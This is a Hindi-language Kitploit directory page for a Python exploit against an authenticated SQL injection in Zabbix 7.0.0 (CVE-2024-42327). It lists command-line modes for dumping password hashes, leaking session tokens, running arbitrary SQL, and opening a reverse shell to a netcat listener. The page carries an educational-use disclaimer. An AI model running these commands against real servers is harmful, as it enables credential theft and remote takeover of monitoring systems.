Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-42327_Zabbix_SQLi — यह केवल शैक्षिक उद्देश्यों के लिए है। कृपया अनधिकृत सिस्टम के विरुद्ध उपयोग न करें। | Kitploit
उपकरण/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

यह केवल शैक्षिक उद्देश्यों के लिए है। कृपया अनधिकृत सिस्टम के विरुद्ध उपयोग न करें।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ Zabbix 7.0.0 SQL इंजेक्शन एक्सप्लॉइट स्क्रिप्ट

एक Python स्क्रिप्ट जो Zabbix 7.0.0 की प्रमाणित SQL इंजेक्शन कमजोरी का शोषण करती है, जो उपयोगकर्ता डेटा निष्कर्षण, सत्र टोकन लीक, रिमोट कमांड निष्पादन (RCE), और कस्टम क्वेरी इंजेक्शन सहित कई कार्रवाई मोड का समर्थन करती है।

⚠️ अस्वीकरण:
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत प्रवेश परीक्षण उद्देश्यों के लिए है।
उन सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण करने की स्पष्ट अनुमति नहीं है।
लेखक इस उपकरण द्वारा किए गए किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


✨ विशेषताएं

  • ✅ Zabbix 7.0.0 के विरुद्ध प्रमाणित SQL इंजेक्शन
  • 🧑‍💻 DB से उपयोगकर्ता हैश डंप करें
  • 🔐 सत्र टोकन लीक करें
  • 🐚 रिवर्स शेल के माध्यम से रिमोट कोड निष्पादन (एडमिन टोकन आवश्यक)
  • 🧠 कस्टम SQL क्वेरी चलाएं

🔧 आवश्यकताएं

  • Python 3.6+
  • requests लाइब्रेरी

यदि आवश्यक हो तो आवश्यकताएं स्थापित करें:

root@kitploit:~
pip install requests

🚀 उपयोग

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]

🔘 उपलब्ध मोड

मोडविवरणएडमिन टोकन आवश्यक
leak-usersसभी उपयोगकर्ता आईडी, उपयोगकर्तानाम, पासवर्ड हैश और भूमिकाओं को डंप करता है❌
leak-tokensडेटाबेस से सभी सक्रिय सत्र आईडी डंप करता है❌
rceitem.create एक्सप्लॉइट के माध्यम से रिवर्स शेल स्पॉन करता है✅
customइंजेक्शन के माध्यम से कोई भी कस्टम SQL क्वेरी चलाएं❌

🧪 उदाहरण

उपयोगकर्ता हैश डंप करें

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

सत्र टोकन लीक करें

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

रिमोट कोड निष्पादन (रिवर्स शेल)

root@kitploit:~
# पहले एक लिसनर शुरू करें:
nc -lvnp 9001

# फिर चलाएं:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

कस्टम SQL इंजेक्शन

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 परियोजना संरचना

root@kitploit:~
sqliZabbix.py      # मुख्य एक्सप्लॉइट स्क्रिप्ट
README.md          # यह दस्तावेज़

🧑‍💻 लेखक

Anthony (@874anthony)

प्यार और जिज्ञासा से बनाई गई 🐍

🔐 लाइसेंस

यह परियोजना MIT लाइसेंस के तहत जारी की गई है। कृपया जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें